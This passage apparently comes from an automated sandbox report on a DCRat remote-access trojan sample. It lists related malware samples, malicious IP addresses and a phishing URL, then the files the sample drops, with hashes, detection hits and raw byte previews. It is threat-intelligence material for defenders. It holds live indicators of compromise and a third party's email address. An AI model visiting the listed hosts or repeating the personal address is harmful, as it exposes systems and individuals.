                                                                                          nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.218.232
                                                                                          FREE-NET-ASFREEnetEUinstaller.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.254.0
                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.254.0
                                                                                          MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.44.131
                                                                                          tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 147.45.47.81
                                                                                          kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                                                          • 147.45.47.156
                                                                                          fkydjyhjadg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 147.45.47.81
                                                                                          KBKHHYI29L.msiGet hashmaliciousAmadeyBrowse
                                                                                          • 147.45.47.167
                                                                                          nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.234.120
                                                                                          https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 147.45.178.112
                                                                                          w3gnakXO9S.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                          • 193.233.132.12
                                                                                          TUT-ASUSmu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • 208.95.112.1
                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                          • 208.95.112.1
                                                                                          run.cmdGet hashmaliciousUnknownBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                          • 208.95.112.1
                                                                                          R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.95.112.1
                                                                                          YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • 208.95.112.1
                                                                                          file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                          • 208.95.112.1
                                                                                          FREE-NET-ASFREEnetEUinstaller.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.254.0
                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.254.0
                                                                                          MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.44.131
                                                                                          tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 147.45.47.81
                                                                                          kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                                                          • 147.45.47.156
                                                                                          fkydjyhjadg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 147.45.47.81
                                                                                          KBKHHYI29L.msiGet hashmaliciousAmadeyBrowse
                                                                                          • 147.45.47.167
                                                                                          nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.234.120
                                                                                          https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 147.45.178.112
                                                                                          w3gnakXO9S.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                          • 193.233.132.12

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0einterior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                          • 91.149.219.45
                                                                                          Payment_Advice.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.219.45
                                                                                          APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 91.149.219.45
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 91.149.219.45
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 91.149.219.45
                                                                                          CLDownloader.exeGet hashmaliciousXWormBrowse
                                                                                          • 91.149.219.45
                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                          • 91.149.219.45
                                                                                          SigWeb.exeGet hashmaliciousUnknownBrowse
                                                                                          • 91.149.219.45
                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                          • 91.149.219.45
                                                                                          http://xn--gmq700hb9ir4byxw.shop/bnBkL2ViZml0c2JwY0F7Zm1mdy9idWp0cHMkbHYvcGQvem1xanVtYnNmZC9xbmJ3MDA7dHF1dWkGet hashmaliciousReCaptcha PhishBrowse
                                                                                          • 91.149.219.45

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\1156fbdc9c3eb4

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (961), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):961
                                                                                          Entropy (8bit):5.915739367222977
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:mnQ1mkKHA1omCjY4jwqAOYl0vgZ84JgcMSuqTWYZ3U3qa/uqlb:mnQ918Y4cHOQYgBJipqiR3Bvb
                                                                                          MD5:7DEDF1EAA93111A2DDF507545CCA014D
                                                                                          SHA1:1A36F321AD1A9A34A6CA8C61424D43E4E5BBE7F8
                                                                                          SHA-256:F47183EADFD5622D07CE7DFF01C573D8DDAD97694B801117F3A31BF8696552C1
                                                                                          SHA-512:FFF96AE0E904F4F851B49323E2A534AAC84C566CF08AA992EECB85F91CFF1A7523E2249B3334647574D686FDAC801EA82F4848F4A2CDFB9F57805F8F6BB738CB
                                                                                          Malicious:false
                                                                                          Preview:QsnD6i0yJVSaDTmmK7I9I99ickY1hFXtbuW7JR40nOfjoRO4itLWRGyQsEkVK8RD7j9S6pd3CSW4eZ4KWdTy4BbU6GOEqjpo7bmES583PSU9u4wSKZ9qpdJ6IoW0aZMdmr7Cxz2bfZilqckBT53Qk88dRp6oiHc0F1WC7tfVhhKQ5hPpDVgff53ntdvH2O2X7sgzGiDkZitCysiuaQkNl6VK8sSe8XcTpwSNBajfS6F6L0zB4BrmnpwAWV1XPjlCGaXBZVs9rF4p0Y8H2Rj7pzp9AS0qiLPsUDzvdxmjSr4iuGJ8Wue89oWQuXAHfCbgzMVxjNnEp9o75HO4I1TyqRtqqiBFxfEQQYsivWZJGZT99ZVmIG8nsnzhcoGALiRK5YrhYqIvcJsQ8tqRNY6qgahniLFGQY8iIIElryNc7NKi5ijt7zxwllne0E8NkCfELJIzoFjZKdsTP8sAlWIalL6gfjunzA24rGXvZtE2PXlH2UO1V8mO4Ec9MmUFU5jKlxlJl6k1RQLNkzoKU3R1YoAnoXixZ9hTyafEsFPYYu6o2PZX7Jubosw7x8eNYwbRs2ZJTjbOn3dnrWuZ7K0QPFpGoiQukBAlSp5AzQEXrfxvOIQbOFQN6LCnMTevSrnl21VBatjrGcitR41gRzgfvwpGmSygvTE91M2XwOAfgiHdmTVSb8ddLIzGLOZI4C5xXj1FCdtDzB8NoMdT7gFx0lysWvLhz2kenUFDbPP7OZoKKmb9vFLY7H7wuIsQSLO6adkUGa2rQHia7oiuTLwtrLhfWTSSg9pDLrtqCH3UNdIzjgyGk87GZfPP6E7wHjKRbfPP41rMScfNDr60eMriBiopcdu7JGNnS1YDRjLtQvy69BMOIHS52mP31jxaHuCMO14LT2i5A8RQurpbRfzCyRvqmfLrwulgtlrIGA5PiW43V8IK3VJl59X7FOjyq0JPW

                                                                                          C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:MSVC .res
                                                                                          Category:dropped
                                                                                          Size (bytes):1168
                                                                                          Entropy (8bit):4.448520842480604
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                          Malicious:false
                                                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4608
                                                                                          Entropy (8bit):3.88895111870669
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:6jmRtWxZ8RxeOAkFJOcV4MKe28dFlvqBHruulB+hnqXSfbNtm:jhxvxVx9llvkdTkZzNt
                                                                                          MD5:A7D6105F158F298518569CB67FF203F9
                                                                                          SHA1:CF2605799EFCB7F1833493115DE53A9E006B3E37
                                                                                          SHA-256:550DC71DA420FD390BC772F9B6A375405408F6EFE58D37A2C4DC653E33BF98FB
                                                                                          SHA-512:77C329F532B39A60861144F472DCD582541A5AC54B63743C2C363F3A42A69D61C4CC873CCDEC908B523D4A1F7D99E84DD625487430A347309E84A3BD6C8FDA98
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.Wg.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                          C:\Program Files (x86)\Windows Mail\1156fbdc9c3eb4

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):243
                                                                                          Entropy (8bit):5.763960449766053
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:8mDGpb91pnClUTqvedQVNjboGN96SAp1SLF0:3D4h18vR//kSApoO
                                                                                          MD5:AEDEBC109AEF66AD239E1D5AF0AD2BDA
                                                                                          SHA1:1EE67C38318EE810D05AA7DCEA93A1155BB7D7EA
                                                                                          SHA-256:1CEC9FC1275790323E3F0735F610D7DC3BD6DCBF4853578B76198E3E0E74A601
                                                                                          SHA-512:D66F1EC94D310671D912ED82939F8C81B4655F05E961D33282DC68E5EABD92E6921F34ABCE94485347BAC08A7E140F1124B36566E56AF94567CE2867C6FA7A45
                                                                                          Malicious:false
                                                                                          Preview:0wfvQz7idYCsBDKS2eXO3ajrgTlpVDFe7ghxlhIOVVfhrQ7LDoWJTcUaNyP7NRMaTivefXrUVI3i4B9PVamrq5LeLHkwSLBDJFOJfcpq6BxKjwfLy9lxpftXXQSYw4CKHzZzx0t3u5upIA5ZmZ8TkOYnV1vPJR3C9mDtXpX7PrCtuEPWU3wX6tk2bve6EeucCspf7LC6BAD2Lo3QlZ5PfgFQCKSlLb2v7krCYuYI1zV6psrw2NU

                                                                                          C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\ProgramData\5b884080fd4f94

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):667
                                                                                          Entropy (8bit):5.900263981266306
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:4jXofsebBuHskvwp0M3J592C1AqByNVi/vnFQEHh:8XQsiBpkvwp0gJ5wqBy7i/9QEB
                                                                                          MD5:4E76FBA96DF31DA23555CE718E996AB5
                                                                                          SHA1:0555D4EA2DD5A27E83AB9EEC060E35B8D8FF4EC0
                                                                                          SHA-256:244033D6A6A3149873BA6F748D10D23FEE2ECF6374B962440BF7A6EAC1102090
                                                                                          SHA-512:BF894FD1F41741CEE1E611477F7C89FBAB5B9CC67C0BE9B037D2EC811F9CDC0BA8AD8F19361B584A984752B0F9261ABA448C68F7512F43DFA33779D9F7EF6E8E
                                                                                          Malicious:false
                                                                                          Preview:kfmSXTiAcfOnDWWg5ET78RCzlRjk6IFyouQCHtHhQyVA2zhpJy8n0MqTdwrGt8ETZZ9TGUYL7vrJ5B6vt3bIKc7cD7iUCAyRuClc0OjyZwpFfgXb05Xzh6J6bgPIvDJ77ZZ3ad5fUmsXx27gkHeGn8uy2oBT8bDVmrIFHdBW91f4NvJjjsiojDU8olBwcmg2iWvFu1ZGFHGvczlGebtQ2ZwjXJbgcO4XVmV0AEzsTcib6jgyA4SA2QAJkLsla2o1NtZzduGZmB6a0Vnymmgh53fFmLQyWNRaxrNNJqVPx2Y0TkTOi38yWG5TNUNSeRDYtfmJHZo6RQtDfovC2BQcPdEqv49ycDugz9Gy7KGJOBhFW2xjjLZcBkIQb5XNa0dNgNNgh7Es5HNN68T3GaORnSeP00WBw2tYiTjJoRBmGqh4X4TcldH9lLkNs8prkC5CYzpnZKOyYmK6uk25g4ZSutwWsVaqlUBEveghPqDbOTl9BndHGuKqnnSpCT4DuiNEkGLQEUq008DbHxUF2Sk0JVaIM0f6v9rqGhY4bMDwEUzoj0hO8zLb7W4PpDDNyuF1RXVkZanpPywzfwiWTR75xPstmIPYIz7UO7XLe7yiMfLJjFu3er4hwKDBol7RKOhZ0bkhZX1VcZsSDjKgYW3a4aiE4Vh

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb47aeb41, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):1048576
                                                                                          Entropy (8bit):0.9433828666010293
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:TSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:TazaHvxXy2V2UR
                                                                                          MD5:8BAF60F7BBF547D99337EC872650D0AE
                                                                                          SHA1:703801967E164F880B6AC615A37833E4138500EB
                                                                                          SHA-256:42047CB41C88F0BCE6980007CF9599F4E7ADF224C9E5DF8D098B0CB3CD23A23E
                                                                                          SHA-512:E908BE70541DEBC8AFE9B248D2DCE9F7E916A4E60721C5198782CAB59124191468FFEC5AA1ADC3997F8161F0B778E9D6D1DB52495FF972CCE2A5E083EB60087C
                                                                                          Malicious:false
                                                                                          Preview:.z.A... ...............X\...;...{......................0.x...... ...{s......|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..........................................|....................j.....|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\fontdrvhost.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\fontdrvhost.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Recovery\1156fbdc9c3eb4

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):376
                                                                                          Entropy (8bit):5.854471858430727
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:CncgHl5nXmko4Wfr1kuURWWRa5spSfjsKwu4zFshE7qzARxU8F9nz0DXzOF9XF7+:CDHnX/o4YOuIPRDsjvwRCi7qzASC543L
                                                                                          MD5:A12CF9D1D8620E46DA8A7501AD729A62
                                                                                          SHA1:ADD7C6C76ED689FA595B4035C018FD8CFD2CD620
                                                                                          SHA-256:0C0F76B64A5AC18CB1AF2393EB868E53BC609CB7AF3E865B316D8658F73FA504
                                                                                          SHA-512:85122F86979E90EAE3D193CE939F7621D6BFC4F550948F4F77E7CC5D4995453FF4796B8E82107B013CA4839FCF85B52B4C3AA7D0AF7BAFF1E4E0BCC3641AD746
                                                                                          Malicious:false
                                                                                          Preview:2VnWByalAktNuC2bHirNpgka9LWB2CWf6kN35bpCsnWKy4OecycAwOrVuNXzbZs7ONRKz8gq3oeBKamE71jDjVts22IrDzlT4Y5knDpdSvGHtpLUlS2jzpX3djR70ymEDLGveBb3MFvyOm9MqxGu6BdPABGDvsmeJCDiiZ0j19Xu3jo1kEQDr1HCr0uc4XHddQoMiaoQ7h37ntVaXPdqbjwS5B0rpXoe13Rm5cSJa9FJ8KY7fTFp3aB3eWQhk6lk3YFucsf46UPcdmUun2MVR8lb1XIjLvjeYfQjFnfwyKtjKjZ1Bg3rtQS4xo2Fk5tKvvE7Vup9XagHPCQS7Rhp11vHNWwavaL2bixZfbfR04TStKovXkHTYDT3

                                                                                          C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe.log

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1281
                                                                                          Entropy (8bit):5.370111951859942
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

